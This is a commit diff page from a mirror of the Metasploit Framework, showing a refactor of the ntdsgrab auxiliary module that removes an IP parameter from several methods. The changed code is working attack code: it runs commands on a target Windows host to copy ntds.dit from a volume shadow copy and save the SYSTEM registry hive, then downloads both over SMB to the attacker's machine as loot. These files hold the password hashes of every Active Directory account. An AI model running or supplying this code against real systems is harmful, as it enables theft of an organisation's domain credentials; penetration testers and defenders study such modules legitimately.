infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

methods that use @ip now reference it directly instead of being passed in as paramaters

unstable
Royce Davis 2013-03-13 19:35:53 -05:00
parent 462ffb78c1
commit abbb3b248d
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/auxiliary/admin/smb/ntdsgrab.rb
View File

@ -88,9 +88,9 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
if vscpath if vscpath
if copy_ntds(@ip, vscpath, text) and copy_sys_hive(@ip) if copy_ntds(vscpath, text) and copy_sys_hive
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"), @ip) download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"), @ip) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
else else
print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.")
end end
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host # Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
def copy_ntds(ip, vscpath, text) def copy_ntds(vscpath, text)
begin begin
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit" ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds" command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary
# Copies the SYSTEM hive file to the Temp directory on the target host # Copies the SYSTEM hive file to the Temp directory on the target host
def copy_sys_hive(ip) def copy_sys_hive
begin begin
# Try to crate the sys hive copy # Try to crate the sys hive copy
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary
# Download the ntds.dit copy to your attacking machine # Download the ntds.dit copy to your attacking machine
def download_ntds(file, ip) def download_ntds(file)
print_status("#{peer} - Downloading ntds.dit file") print_status("#{peer} - Downloading ntds.dit file")
begin begin
# Try to download ntds.dit # Try to download ntds.dit
simple.connect("\\\\#{@ip}\\#{@smbshare}") simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob') remotefile = simple.open("#{file}", 'rob')
data = remotefile.read data = remotefile.read
store_loot("NTDS.database", "data", ip, data, "ntds.dit", nil, nil) store_loot("NTDS.database", "data", @ip, data, "ntds.dit", nil, nil)
remotefile.close remotefile.close
rescue StandardError => ntdsdownloaderror rescue StandardError => ntdsdownloaderror
print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
@ -210,14 +210,14 @@ class Metasploit3 < Msf::Auxiliary
# Download the SYSTEM hive copy to your attacking machine # Download the SYSTEM hive copy to your attacking machine
def download_sys_hive(file, ip) def download_sys_hive(file)
print_status("#{peer} - Downloading SYSTEM hive file") print_status("#{peer} - Downloading SYSTEM hive file")
begin begin
# Try to download SYSTEM hive # Try to download SYSTEM hive
simple.connect("\\\\#{@ip}\\#{@smbshare}") simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob') remotefile = simple.open("#{file}", 'rob')
data = remotefile.read data = remotefile.read
store_loot("Registry.hive.system", "binary/reg", ip, data, "system-hive", nil, nil) store_loot("Registry.hive.system", "binary/reg", @ip, data, "system-hive", nil, nil)
remotefile.close remotefile.close
rescue StandardError => sysdownloaderror rescue StandardError => sysdownloaderror
print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}")